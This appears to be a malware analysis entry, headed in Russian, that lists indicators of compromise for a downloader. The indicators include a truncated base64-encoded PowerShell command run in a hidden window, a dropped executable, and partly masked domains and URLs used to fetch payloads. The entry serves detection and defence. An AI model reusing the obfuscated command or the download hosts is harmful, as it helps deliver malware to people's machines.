Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxAEEAUQBEAGsAQQBRAEEAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAHoAWABCAFUAJwAsACcAQQB4AFUAJwApADsAJAByAEEAUQBrAEEAQgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAAKAAnAE4AZQB0AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1532
- %TEMP%\752892.cvr
- %HOMEPATH%\489.exe
- %HOMEPATH%\489.exe
- 'ar####utomaten.com':80
- 'ar###shop.be':443
- 'na####ofincas.com':80
- 'nf##o.com':80
- 'nf##o.com':443
- 'nk##.com':80
- http://ar####utomaten.com/wp-content/IXLg/
- http://na####ofincas.com/imagenes/HVp/
- http://nf##o.com/img/upload_Image/edm/pic_2/azW/
- http://www.nf##o.com/img/upload_Image/edm/pic_2/azW/
- http://nk##.com/FaceValue/prjcW/
- 'ar####utomaten.com':443
- 'nf##o.com':443
- DNS ASK ar####utomaten.com
- DNS ASK ar###shop.be
- DNS ASK na####ofincas.com
- DNS ASK no####gotten.com
- DNS ASK nf##o.com
- DNS ASK nk##.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxAEEAUQBEAGsAQQBRAEEAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAHoAWABCAFUAJwAsACcAQQB4AFUAJwApADsAJAByAEEAUQBrAEEAQgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAAKAAnAE4AZQB0AC...' (со скрытым окном)